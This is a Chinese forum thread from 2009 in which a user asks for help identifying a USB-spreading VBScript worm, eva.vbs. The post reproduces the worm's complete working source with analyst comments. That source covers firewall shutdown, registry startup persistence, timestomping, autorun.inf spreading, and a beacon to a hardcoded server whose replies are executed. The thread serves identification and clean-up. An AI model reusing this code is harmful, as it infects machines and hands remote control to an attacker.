
[求助] 关于U盘传播型病毒eva.vbs

关于U盘传播型病毒eva.vbs

在U盘里面发现一个eva.vbs和一个打开其的autorun.inf

卡巴最新没报,请教这个是什么毒?有什么影响?

' --- Analyst notes (defender's reading of the sample exactly as posted) ---
' Every meaningful string is hidden behind StrReverse()/Unescape(), and the
' letter case of the whole file is re-randomised on every copy (see vs()
' below), so a byte signature taken from one sample will not match the next.
' Decoded values are given below where they matter for clean-up or detection.
' Artifacts this script leaves, all visible in the code: eva.vbs + autorun.inf
' in the root of every ready drive, %SystemRoot%\System32\prnCFG.vbs, two
' registry startup-script entries (see the .reg note), a stopped SharedAccess
' service, and an HTTP beacon with User-Agent "EvaR". All lines added here are
' apostrophe comments; the code itself is untouched.
oN erROR reSuMe NeXT
' Suppresses every runtime error so the script keeps going whatever fails.
' Object names are reversed: "Scripting.FileSystemObject" and "WScript.Shell".
sEt FsO=creAtEoBjeCT(strreVERSe("tceJbOmetsyseLif.GnITpIrCS"))
sEt WSHshELL=cREaTeOBjECt(strReverSe("lLehS.tPIrCsw"))
Dim dRi_LiSt,Dri_lIst0
DIm iSSEND
IsseND=0
' Current date is saved so it can be restored after the clock changes below.
c_TImE=dATE()
' Stops the SharedAccess service (Windows Firewall / Internet Connection
' Sharing) in a hidden window (0). A firewall service that stops by itself is
' a useful detection signal for this family.
wShShElL.RuN "net STop SHarEdaCcESS",0
' Global drive collection; listdrv() below walks it.
sET DRVs=fsO.dRIveS
' GetSpecialFolder(1) is the System folder (System32).
SysDiR=FSo.GEtsPecIaLFoldEr(1)
THIspath=WSCrIpt.sCrIptfullnAme
' Reads its own source into sCopy; every dropped copy is rebuilt from it.
sET Fc=FSo.opeNtEXTFilE(ThiSPaTh,1)
sCopy=fc.rEaDalL
Fc.CLoSe
sET Fc=NoThINg
' Persistence. The reversed/escaped blob decodes to a "Windows Registry Editor
' Version 5.00" file that registers %WinDir%\System32\prnCfg.vbs as a machine
' startup script ("Script"=..., "Parameters"="", "ExecTime"=hex(b):00,...)
' under both
'   HKLM\Software\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0
'   HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0
' It is imported silently (regedit /s) and the .reg file is deleted 200 ms
' later, so only the registry entries and prnCfg.vbs remain on disk. Deleting
' eva.vbs from the USB stick alone does not clean an already infected PC;
' both keys and the System32 copy have to go as well.
CAll wRiteFILE(sySDIR&"\SysiNFO.reg",UnEScAPE(sTrrEvErSe("00C2%00c2%00c2%00c2%00c2%00C2%00C2%00C2%00C2%00c2%00C2%00C2%00C2%00C2%00C2%00A3%92%b82%xehd3%22%eMitceXe22%a0%d0%02%22%22%d3%22%sreTeMARAp22%A0%D0%02%22%SbV.gfCnrpc5%C5%23mEtsYSc5%c5%52%RidNiW52%22%D3%22%TpirCS22%a0%D0%02%D5%0C5%0c5%pUTrATsC5%stPirCsC5%eNIHcAmC5%etATsc5%YciLop02%PUORGC5%NOiSREvTneRRuCC5%SWODniWc5%TFoSORciMc5%eRAwtfOsC5%enIHCam_laCOL_yEkhb5%a0%d0%a0%D0%02%00c2%00C2%00c2%00C2%00C2%00C2%00C2%00C2%00c2%00c2%00c2%00C2%00c2%00c2%00c2%00a3%92%b82%xehD3%22%eMITCExe22%a0%D0%02%22%22%D3%22%srEtEmArAP22%a0%d0%02%22%Sbv.gfCnRPC5%C5%23MeTSYsC5%C5%52%rIDNIw52%22%D3%22%tPirCs22%a0%d0%02%D5%0c5%0C5%PuTratsC5%stpircsC5%mEtSYsC5%SWodniwC5%TFOsoRCImc5%sEiCIlOPc5%erAwtfoSc5%eNihCam_LaCol_yEKhB5%A0%d0%a0%D0%03%03%e2%53%02%E6%F6%96%37%27%56%65%02%27%f6%47%96%46%54%02%97%27%47%37%96%76%56%25%02%37%77%f6%46%e6%96%75%")))
WShSHEll.ruN "RegeDiT /s SYSinfo.REG",0
wsCrIpt.sleeP 200
FsO.DELetefiLE SYSdiR&"\sYSiNfO.rEG",truE
' Two modes. Running from the System folder means this is the persisted copy
' (spreader + beacon loop); anything else is the first run from removable
' media (installer branch after "else").
if iNstR(tHisPAtH,sYsDIr)>0 tHeN
' Snapshot of the drive letters present right now.
DrI_liSt0=liSTDRv()
' Takes the 4th character of the date string as a digit, subtracts one, and
' sets the system clock to that date while writing to every drive, restoring
' it afterwards. Which field that character belongs to depends on the locale
' date format; presumably meant to turn the year back so the dropped files
' carry old timestamps -- TODO confirm.
O_TimE=leFT(C_timE,3)&cSTR(iNt(MiD(C_TIMe,4,1))-1)&riGHt(C_tImE,LEN(C_tIMe)-4)
wSHsHEll.RUN "CmD /C DATe "&o_tIMe,0
WsCriPT.sleep 10000
foR Dri_i=1 To lEn(DrI_LISt0)
CaLL WriTEAutO(mId(DrI_lIst0,dri_I,1)&":\")
NeXt
wSHsHelL.RuN "CmD /c dAte "&C_timE,0
' Victim identification via WMI: computer name and logged-on user name, with
' "evAr" as fallback, combined into COMPUTER\user for the beacon below.
coMputERNAme="":uSErNAMe=""
sEt oBJWmIsErvicE=getOBjeCt("wINMGMTS:{IMpERSoNatIOnLEveL=IMpeRsOnATe}!\\.\roOt\Cimv2")
seT ColcomPUTErS = oBjWmiserviCe.eXeCQuErY("selecT * FRom WIn32_cOmPUtERsYsteM")
FoR eAch obJCoMpuTer iN cOlCoMPuTeRS
CoMpUtErName=OBJCOmPUtEr.NAMe
uSErNAme=ObjComPuTeR.USErNaMe
nExt
IF uSerNamE="" THeN uSERnAme="evAr"
IF iNsTr(useRNamE,"\")<=0 ThEn
uSERname=cOmPuTernaMe&"\"&useRnamE
EnD If
' Main loop; it never exits. Until one request succeeds (IsSend stays 0 on
' error) every pass sends the HTTP beacon; every pass also infects newly
' attached drives, then sleeps one second.
do
If ISsenD=0 tHEn
' "MSXML2.ServerXMLHTTP" (reversed) GET to the decoded URL
'   http://202.119.104.100/zzb/eva/count.asp?a=<COMPUTER\user>
' with User-Agent "EvaR". If the reply begins with "Execute", the whole
' response body is handed to Execute, i.e. whoever controls that host can push
' arbitrary VBScript to every infected machine. The fixed User-Agent and URL
' are the network indicators to look for in proxy and firewall logs.
SEt XML=crEateOBjEct(stRrEVErSe("ptThLmxReVrES.2lMXsm"))
xMl.opEN "GeT",StRREVeRse(UnEScaPE("%3d%61%3f%70%73%61%2E%74%6E%75%6F%63%2f%61%76%65%2F%62%7a%7a%2F%30%30%31%2E%34%30%31%2E%39%31%31%2e%32%30%32%2f%2F%3a%70%74%74%68"))&uSeRnamE,0
XMl.sETreqUEsThEAdER "useR-agENt","EvaR"
XmL.sEnd()
iF ErR.nUmBEr=0 ThEn
IssenD=1
rES=XmL.REsPonSEtEXt
If UcaSe(lEfT(ReS,7))=uCase("ExeCutE") ThEN eXEcUTE Res
elSe
ERR.cLeAr
enD if
sET xmL=NoThIng
End if

' Drive letters present now versus the last snapshot: every new letter gets
' autorun.inf and EVA.vbs written to its root.
dRi_liSt=lisTdrv()
FoR dRi_k=1 tO LeN(Dri_LIst)
iF INsTR(Dri_List0,mId(Dri_lIST,Dri_k,1))<=0 ThEN
cALl WrItEaUtO(mid(DRI_lISt,dRI_K,1)&":\")
ENd If
nExT
DRi_lIst0=Dri_lISt
wsCriPT.sLEEp 1000
Loop
eLse
' Installer branch (first run from the USB stick).
' Opens an Explorer window on the current folder (3 = maximized), activates
' the window titled "我的电脑" ("My Computer", decoded from the %u escapes)
' and sends Alt+Space, C (system menu, Close). Looks like it is closing the
' window the autorun handler opened so the user sees nothing unusual -- an
' inference, not provable from the code alone.
WShsHeLl.run "exPloRER .\",3
WscRIPt.sleeP 2000
wShShelL.apPactIvATe uNeScapE(LcASE("%u6211%u7684%u7535%u8111"))
wsHshElL.SeNdkEys uCasE("% C")
' Single-instance check: counts running wscript.exe processes through WMI and
' quits if there are already two (this one plus a persisted copy).
RunFlAg=0
For eACH Ps In gETOBjEct _
("WInmGmtS:\\.\ROOt\cImv2:Win32_ProCesS").INsTANcES_
iF lcAse(ps.NAMe)=lCaSe("WScrIpt.EXe") ThEn
rUNFlag=ruNfLaG+1
EnD if
neXt
If RuNfLaG>=2 tHeN WscrIPt.qUIt
' Drops the persisted copy. The clock is first set to the System folder's
' creation date so %WinDir%\System32\prnCFG.vbs gets timestamps that blend in
' with the OS install (timestomping), then the clock is restored and the copy
' is launched. The copy is re-cased by vs(), so its bytes differ from the
' file on the USB stick.
SEt SF=fso.getFOlDer(sySdIR)
f_TimE=LefT(Sf.DaTeCReaTeD,InStR(sf.DATECrEAtEd," ")-1)
wSHshELl.Run "CmD /C dAtE "&f_time,0
WscRipT.SlEEP 100
CaLL wRitEfiLE(SysDiR&LcasE("\PrnCFG.vBS"),vS(sCOPy))
wShShEll.rUn "cmD /c datE "&c_tImE,0
wShSHEll.RUn sYSdIr&"\PRNCfg.Vbs"
eNd If
' vs(str): case-randomising copier. The reversed/escaped string decodes to a
' loop over str that upper-cases each character and, with about 50% odds
' (Randomize / Int(Rnd()*100)>50), lower-cases it again, then replaces "%U"
' with "%u" so the Unicode escapes fed to Unescape() stay valid. The result is
' returned through the function name. Purpose from a defender's view: every
' written copy of the script has a different letter-case pattern, so a
' byte-exact signature on one sample misses the next; hash-based IoCs are
' therefore unreliable for this family, file names and registry keys are not.
fUNCtIon vs(sTr)
ExECuTe StrReVeRsE(UnescAPE("%29%29%22U%25%22%28esACl%2c%29%22u%25%22%28esAcu%2CSv%28eCalPER%3DSv%0d%0AtXen%0d%0afI%20dnE%0d%0ac%26sV%3DSV%0D%0aEsLe%0D%0a%29c%28eSacl%26Sv%3Dsv%0d%0AnEHt%2005%3e%29001*%29%28dnR%28tNI%20FI%0d%0aeZImOdNAr%0d%0A%29%291%2ci%2crtS%28DIM%28ESAcu%3dC%0D%0A%29rts%28NEL%20OT%201%3DI%20RoF"))
END FuNCtioN
' listdrv(): returns a string of drive letters. The decoded body walks the
' global DRVs collection (fso.Drives, set at top level) and appends
' Drv.DriveLetter for every drive whose IsReady is true. Removable media that
' has just been plugged in shows up here, which is how the main loop notices
' a new drive to write to.
fuNCtiON liSTDRV()
EXECUTe stRReVERsE(UNesCape("tSIL_Pmt%3dVRDtsIL%0d%0ATXen%0d%0AfI%20dNe%0d%0arEttelEViRD.VrD%26tSil_pMT%3DtSIL_PmT%0D%0aneht%20YDAersi.vRD%20fi%0d%0AsVRd%20nI%20VRd%20HCaE%20roF%0D%0A%22%22%3dtsIL_Pmt%0D%0ATSIL_pmT%20mId"))
ENd FuncTIOn

' writeauto(path): plants the infection in the root of one drive (path ends
' in ":\"). The decoded Execute body first clears the way: a *folder* named
' autorun.inf (the common "immunisation" trick of that era) is renamed to a
' random-number name with MoveFolder, and a plain autorun.inf file is
' deleted. It then writes AUTORUN.INF and EVA.vbs (a re-cased copy of this
' script via vs()); both get hidden+system+read-only through writefile().
' The autorun.inf maps the drive's shell\open, shell\explore and shell\find
' commands to "WScript.exe EVA.vbs", so besides the AutoPlay path, choosing
' Open / Explore / Search from the drive's right-click menu also runs the
' worm. Browsing into the drive from Explorer's folder tree does not use
' those verbs, which matches the advice given later in this thread; the
' drive is still infected and must be cleaned.
sUB wrITEAUTO(pATH)
eXecUTe STrREVErsE(uneScAPE("fi%20DNE%0D%0aeurT%2c%22fNI.nUROtuA%22%26htAp%20ELiFEtElED.osF%0D%0ANEHt%20%29%22FNI.nurotua%22%26hTaP%28StsIXeelIf.Osf%20FiesLE%0D%0A%29%28dNR%26hTAP%2C%22fni.NURotuA%22%26HTAp%20rEdLoFeVOM.OsF%0d%0ANehT%20%29%22FNI.NURoTUA%22%26hTAp%28sTSIXerEdlof.oSF%20fi"))
' Template for the three shell verbs; "*" is replaced with open/explore/find.
CmdSTR="shELL\*\coMMAnD=WscRiPT.eXe "&chr(34)&"EvA.vbs"&cHr(34)
AUToStR="[AUtorun]"&VBCrlf&"oPEn="&vBCrlf&rEPlace(CmdsTR,"*","oPEN")&VBcRLf&REPLAce(cmdSTR,"*","EXPLORE")&VBcRlF&RePLACE(CMdstR,"*","fiND")
CALL WRiTEFILE(PatH&uCASe("AUtoRun.iNf"),aUtostr)
caLL writEFIle(paTH&"EVA.vBs",vs(scOpy))
eND SuB

' writefile(fpath, content): the worm's only file writer. The decoded body
' deletes an existing file at fpath (force), opens it ForWriting (2) with
' create=True, writes content, closes it, and sets Attributes = 7, i.e.
' ReadOnly (1) + Hidden (2) + System (4). With the default Explorer settings
' ("hide protected operating system files") such files are invisible even
' when "show hidden files" is on, which is why the poster saw only the two
' names that were already visible; use "dir /a" or disable that option when
' checking a drive.
Sub wRITEFiLE(fPaTh,CONtent)
eXECute StRRevErsE(uneScAPe("gnIhtoN%3dAF%20TES%0d%0a7%3DSETUBirtta.AF%0d%0A%29HTAPF%28ELiFtEg.oSF%3DaF%20tES%0d%0agNIhtoN%3DCF%20TES%0D%0aeSOlC.Cf%0D%0aTnetnOc%20eTirw.cF%0d%0A%29euRT%2c2%2CHTaPF%28ElIFtxEtnEpo.oSF%3DcF%20tes%0d%0AEURT%2CHtApF%20ELifeteled.OSf%20NeHT%20%29HtapF%28stsixEeliF.osF%20fI"))
ENd SuB


谢谢

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; eBook; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; CIBA; MAXTHON 2.0)

回复: 关于U盘传播型病毒eva.vbs



引用:
原帖由 backway 于 2009-1-2 22:19:00 发表
VBS脚本语言。看不懂。。。
如不是人为放进去的就删了。autorun.inf里内容是什么?


[AUtorUN]
OPen=
sHElL\opeN\coMmAnd=WscriPt.eXE "EVA.vbs"
sHElL\exPLoRE\coMmAnd=WscriPt.eXE "EVA.vbs"
sHElL\FiNd\coMmAnd=WscriPt.eXE "EVA.vbs"


也就是一个打开eva.vbs文件的东西

我也不懂vbs,所以来求助的

回复:关于U盘传播型病毒eva.vbs

hi,backway

想请问一下,如果我是用资源管理器的左侧树状图打开的,而不是双击打开的

这个病毒可能运行不?

回复: 关于U盘传播型病毒eva.vbs





引用:
原帖由 backway 于 2009-1-2 22:57:00 发表
没事吧,autorun.inf里没有shell\explore=资源管理器




引用:
原帖由 aaccbbdd 于 2009-1-2 22:56:00 发表
不会被运行



谢谢aaccbbdd和backway的帮助
最后编辑chaosguy 最后编辑于 2009-01-02 23:02:09

回复: 关于U盘传播型病毒eva.vbs





引用:
原帖由 hl7310 于 2009-1-2 22:52:00 发表
VBS脚本经过加密了


啊哈哈,我也很想知道被解密出来的是什么

回复: 关于U盘传播型病毒eva.vbs



引用:
原帖由 ★【正气大侠】★ 于 2009-1-2 23:24:00 发表
用瑞星杀杀看,可上报一下

它的结构有点像VB

把autorun.inf
的内容发一下



米有瑞星,额。我以前的正版瑞星过期之后就没有再买了

以前一直在卡卡玩的,现在有问题了还是习惯性的来这里

以前的账号也忘了,就注册了新号

inf文件的内容在3楼

回复: 关于U盘传播型病毒eva.vbs



引用:
原帖由 ★【正气大侠】★ 于 2009-1-2 23:38:00 发表
what?????????

来卡卡社区你竟敢不用瑞星?

大侠很生气,后果很严重!



接受不同的事物

回复: 关于U盘传播型病毒eva.vbs



引用:
原帖由 ★【正气大侠】★ 于 2009-1-2 23:41:00 发表
右击你的优盘,看看“打开”是否只有一个?是否是高亮?

怎么感觉跟劫持一样



“打开”只有一个,不是高亮

记得以前的U盘病毒,右键的时候都有一个auto一类的玩意儿

现在越来越高级了

回复: 关于U盘传播型病毒eva.vbs



引用:
原帖由 最硬的石头 于 2009-1-3 0:02:00 发表
U盘下是不是有个exe格式的病毒已经被瑞星杀掉了?


应该是没有,这个U盘我拿出去打印东西的

然后就直接插到我的电脑上了

我的反病毒软件什么都没反应,我强制它扫描也没报

更别说杀什么EXE文件了,哎